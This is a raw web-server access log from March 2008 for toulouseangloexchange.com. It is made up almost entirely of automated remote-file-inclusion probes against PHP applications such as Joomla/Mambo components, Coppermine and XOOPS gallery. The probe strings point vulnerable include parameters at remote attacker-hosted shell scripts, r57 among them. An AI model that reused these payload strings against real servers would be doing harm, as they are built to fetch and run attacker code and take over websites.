89.108.67.184 - - [30/Mar/2008:17:01:52 -0700] "GET /logs/access_080127.log/appserv/errors.php?error=http://www.manzoteam.it/millesimo/foto_week/36.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.108.67.184 - - [30/Mar/2008:17:01:52 -0700] "GET /logs/appserv/errors.php?error=http://www.manzoteam.it/millesimo/foto_week/36.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
86.38.160.137 - - [30/Mar/2008:17:02:04 -0700] "GET /logs/access_080127.log/appserv/errors.php?error=http://www.manzoteam.it/millesimo/foto_week/36.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
86.38.160.137 - - [30/Mar/2008:17:02:04 -0700] "GET /appserv/errors.php?error=http://www.manzoteam.it/millesimo/foto_week/36.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
86.38.160.137 - - [30/Mar/2008:17:02:04 -0700] "GET /logs/appserv/errors.php?error=http://www.manzoteam.it/millesimo/foto_week/36.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
89.107.66.224 - - [30/Mar/2008:17:02:52 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://autogg.it/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.toulouseangloexchange.com"
89.107.66.224 - - [30/Mar/2008:17:02:52 -0700] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://autogg.it/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.toulouseangloexchange.com"
65.98.28.18 - - [30/Mar/2008:17:03:32 -0700] "GET /logs/access_080225.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.manzoteam.it/millesimo/foto_week/36.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.58.135.90 - - [30/Mar/2008:17:04:30 -0700] "GET /logs/access_080114.log/modules/coppermine/themes/default/theme.php?THEME_DIR=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.58.135.90 - - [30/Mar/2008:17:04:30 -0700] "GET /logs/access_080114.log/modules/coppermine/themes/default/theme.php?THEME_DIR=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.58.135.90 - - [30/Mar/2008:17:04:32 -0700] "GET /logs/access_080114.log/modules/coppermine/themes/default/theme.php?THEME_DIR=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.58.135.90 - - [30/Mar/2008:17:04:32 -0700] "GET /logs/access_080114.log/modules/coppermine/themes/default/theme.php?THEME_DIR=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
205.234.213.67 - - [30/Mar/2008:17:05:16 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
205.234.213.67 - - [30/Mar/2008:17:05:16 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
89.107.66.224 - - [30/Mar/2008:17:05:26 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://autogg.it/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.toulouseangloexchange.com"
89.107.66.224 - - [30/Mar/2008:17:05:26 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://autogg.it/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.toulouseangloexchange.com"
80.249.117.99 - - [30/Mar/2008:17:06:23 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.toulouseangloexchange.com"
80.249.117.99 - - [30/Mar/2008:17:06:23 -0700] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.toulouseangloexchange.com"
69.90.114.126 - - [30/Mar/2008:17:06:51 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.buyindianproducts.com/includes/font/idrac2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
69.90.114.126 - - [30/Mar/2008:17:06:51 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.buyindianproducts.com/includes/font/idrac2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
69.90.114.126 - - [30/Mar/2008:17:06:51 -0700] "GET /logs/access_080211.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.buyindianproducts.com/includes/font/idrac2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
212.116.174.9 - - [30/Mar/2008:17:07:09 -0700] "GET /logs/access_080225.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
69.72.215.178 - - [30/Mar/2008:17:07:40 -0700] "GET /logs/access_080114.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.72.215.178 - - [30/Mar/2008:17:07:40 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.72.215.178 - - [30/Mar/2008:17:07:40 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
66.40.65.240 - - [30/Mar/2008:17:07:41 -0700] "GET /logs/access_080114.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
66.40.65.240 - - [30/Mar/2008:17:07:41 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
66.40.65.240 - - [30/Mar/2008:17:07:41 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
195.56.111.194 - - [30/Mar/2008:17:08:04 -0700] "GET /logs/access_080114.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
195.56.111.194 - - [30/Mar/2008:17:08:04 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
195.56.111.194 - - [30/Mar/2008:17:08:04 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
204.15.133.133 - - [30/Mar/2008:17:08:11 -0700] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://66.194.79.1/~holeshot/form/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
204.15.133.133 - - [30/Mar/2008:17:08:11 -0700] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://66.194.79.1/~holeshot/form/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.toulouseangloexchange.com"
62.193.224.190 - - [30/Mar/2008:17:08:33 -0700] "GET /logs/access_080225.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
212.116.174.9 - - [30/Mar/2008:17:09:53 -0700] "GET /logs/scripts.log//Neos_Chronos/header.php?base_folder=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
77.221.130.3 - - [30/Mar/2008:17:09:58 -0700] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://discount-guns.com//modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
77.221.130.3 - - [30/Mar/2008:17:09:58 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://discount-guns.com//modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
66.40.65.240 - - [30/Mar/2008:17:10:12 -0700] "GET /logs/access_071126.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
69.72.215.178 - - [30/Mar/2008:17:10:17 -0700] "GET /logs/access_071126.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
140.113.4.81 - - [30/Mar/2008:17:10:43 -0700] "GET /logs/access_080114.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
140.113.4.81 - - [30/Mar/2008:17:10:44 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
140.113.4.81 - - [30/Mar/2008:17:10:44 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
195.56.111.194 - - [30/Mar/2008:17:11:04 -0700] "GET /logs/access_071126.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.15.78.65 - - [30/Mar/2008:17:11:07 -0700] "GET /includes/settings.inc.php?include_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.toulouseangloexchange.com"
67.15.78.65 - - [30/Mar/2008:17:11:12 -0700] "GET /logs/includes/settings.inc.php?include_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.toulouseangloexchange.com"
89.111.173.76 - - [30/Mar/2008:17:11:21 -0700] "GET /logs/access_080114.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.111.173.76 - - [30/Mar/2008:17:11:21 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.111.173.76 - - [30/Mar/2008:17:11:22 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
204.15.133.133 - - [30/Mar/2008:17:12:05 -0700] "GET /logs/includes/functions_weblog.php?mx_root_path=http://66.194.79.1/~holeshot/form/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.toulouseangloexchange.com"
204.15.133.133 - - [30/Mar/2008:17:12:05 -0700] "GET /includes/functions_weblog.php?mx_root_path=http://66.194.79.1/~holeshot/form/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.toulouseangloexchange.com"
80.249.117.99 - - [30/Mar/2008:17:13:08 -0700] "GET /includes/settings.inc.php?include_path=http://w0rms.by.ru/safe.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.toulouseangloexchange.com"
80.249.117.99 - - [30/Mar/2008:17:13:09 -0700] "GET /logs/includes/settings.inc.php?include_path=http://w0rms.by.ru/safe.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.toulouseangloexchange.com"
62.193.226.196 - - [30/Mar/2008:17:14:23 -0700] "GET /logs/access_080114.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
62.193.226.196 - - [30/Mar/2008:17:14:23 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
62.193.226.196 - - [30/Mar/2008:17:14:24 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.60.102.67 - - [30/Mar/2008:17:15:24 -0700] "GET /logs/access.log//main.php?sayfa=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
88.60.102.67 - - [30/Mar/2008:17:15:25 -0700] "GET //main.php?sayfa=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
88.60.102.67 - - [30/Mar/2008:17:15:25 -0700] "GET /logs//main.php?sayfa=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
140.113.4.81 - - [30/Mar/2008:17:15:41 -0700] "GET /logs/access_071126.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
212.116.174.9 - - [30/Mar/2008:17:15:47 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
212.116.174.9 - - [30/Mar/2008:17:15:51 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
212.116.174.9 - - [30/Mar/2008:17:15:54 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
62.193.226.196 - - [30/Mar/2008:17:16:41 -0700] "GET /logs/access_071126.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
212.116.174.9 - - [30/Mar/2008:17:17:12 -0700] "GET /logs/access_080224.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
87.118.102.153 - - [30/Mar/2008:17:19:39 -0700] "GET /logs/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.toulouseangloexchange.com"
87.118.102.153 - - [30/Mar/2008:17:19:39 -0700] "GET /components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.toulouseangloexchange.com"
74.205.57.211 - - [30/Mar/2008:17:20:23 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://hoypinoy.com/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.toulouseangloexchange.com"
74.205.57.211 - - [30/Mar/2008:17:20:23 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://hoypinoy.com/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
74.205.57.211 - - [30/Mar/2008:17:20:27 -0700] "GET /index.php?page=http://hoypinoy.com/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
74.205.57.211 - - [30/Mar/2008:17:20:27 -0700] "GET /logs/index.php?page=http://hoypinoy.com/riCo?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.toulouseangloexchange.com"
67.15.78.65 - - [30/Mar/2008:17:24:11 -0700] "GET /logs/includes/settings.inc.php?include_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.toulouseangloexchange.com"
67.15.78.65 - - [30/Mar/2008:17:24:12 -0700] "GET /includes/settings.inc.php?include_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.toulouseangloexchange.com"
205.234.213.67 - - [30/Mar/2008:17:27:00 -0700] "GET /logs/access_080303.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.188.72.170 - - [30/Mar/2008:17:27:53 -0700] "GET /logs/access_080303.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.vsm.gov.tr/pwnd/safe.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
150.164.52.182 - - [30/Mar/2008:17:33:46 -0700] "GET /logs//includes/db_adodb.php?baseDir=http://www.brasvip.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.toulouseangloexchange.com"
150.164.52.182 - - [30/Mar/2008:17:33:47 -0700] "GET //includes/db_adodb.php?baseDir=http://www.brasvip.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.toulouseangloexchange.com"
202.160.178.101 - - [30/Mar/2008:17:33:58 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "www.toulouseangloexchange.com"
202.160.178.70 - - [30/Mar/2008:17:33:59 -0700] "GET / HTTP/1.0" 200 903 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "www.toulouseangloexchange.com"
74.6.21.187 - - [30/Mar/2008:17:34:12 -0700] "GET /logs/access_071105.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
88.60.102.67 - - [30/Mar/2008:17:37:43 -0700] "GET //main.php?sayfa=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
212.116.174.9 - - [30/Mar/2008:17:38:21 -0700] "GET /logs/access_071119.log//newspublish/include.php?path%5Bdocroot%5D=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
212.116.174.9 - - [30/Mar/2008:17:38:25 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
212.116.174.9 - - [30/Mar/2008:17:38:28 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
212.116.174.9 - - [30/Mar/2008:17:39:04 -0700] "GET /logs/access_080107.log//newspublish/include.php?path%5Bdocroot%5D=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
213.156.192.5 - - [30/Mar/2008:17:39:58 -0700] "GET /logs/access_080211.log//script_path/templates/2blue/bodyTemplate.php?serverPath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
213.156.192.5 - - [30/Mar/2008:17:39:58 -0700] "GET //script_path/templates/2blue/bodyTemplate.php?serverPath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
213.156.192.5 - - [30/Mar/2008:17:39:59 -0700] "GET /logs//script_path/templates/2blue/bodyTemplate.php?serverPath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
213.156.192.5 - - [30/Mar/2008:17:39:59 -0700] "GET /logs/access_080303.log//script_path/templates/2blue/bodyTemplate.php?serverPath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
207.188.72.170 - - [30/Mar/2008:17:43:17 -0700] "GET /logs/access.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.vsm.gov.tr/pwnd/safe.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
207.188.72.170 - - [30/Mar/2008:17:43:17 -0700] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.vsm.gov.tr/pwnd/safe.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
207.188.72.170 - - [30/Mar/2008:17:43:18 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.vsm.gov.tr/pwnd/safe.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
213.156.192.5 - - [30/Mar/2008:17:43:57 -0700] "GET /logs/access_080211.log//script_path/templates/2blue/bodyTemplate.php?serverPath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
213.156.192.5 - - [30/Mar/2008:17:43:57 -0700] "GET //script_path/templates/2blue/bodyTemplate.php?serverPath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
213.156.192.5 - - [30/Mar/2008:17:43:58 -0700] "GET /logs//script_path/templates/2blue/bodyTemplate.php?serverPath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
213.156.192.5 - - [30/Mar/2008:17:43:58 -0700] "GET /logs/access_080303.log//script_path/templates/2blue/bodyTemplate.php?serverPath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
221.143.48.95 - - [30/Mar/2008:17:44:58 -0700] "GET /logs//dreamaccount/auth.header.inc.php?da_path=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
221.143.48.95 - - [30/Mar/2008:17:44:59 -0700] "GET //dreamaccount/auth.header.inc.php?da_path=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
61.63.3.45 - - [30/Mar/2008:17:45:26 -0700] "GET /logs/access_080211.log//script_path/templates/2blue/bodyTemplate.php?serverPath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
61.63.3.45 - - [30/Mar/2008:17:45:26 -0700] "GET //script_path/templates/2blue/bodyTemplate.php?serverPath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
61.63.3.45 - - [30/Mar/2008:17:45:27 -0700] "GET /logs//script_path/templates/2blue/bodyTemplate.php?serverPath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
61.63.3.45 - - [30/Mar/2008:17:45:28 -0700] "GET /logs/access_080303.log//script_path/templates/2blue/bodyTemplate.php?serverPath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
195.19.33.141 - - [30/Mar/2008:17:46:53 -0700] "GET /logs/access_080303.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=www.cypris.de/images/stories/frut/uploads/micid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
207.188.72.170 - - [30/Mar/2008:17:47:43 -0700] "GET /logs/access_080225.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.vsm.gov.tr/pwnd/safe.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
74.52.2.130 - - [30/Mar/2008:17:47:44 -0700] "GET /components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
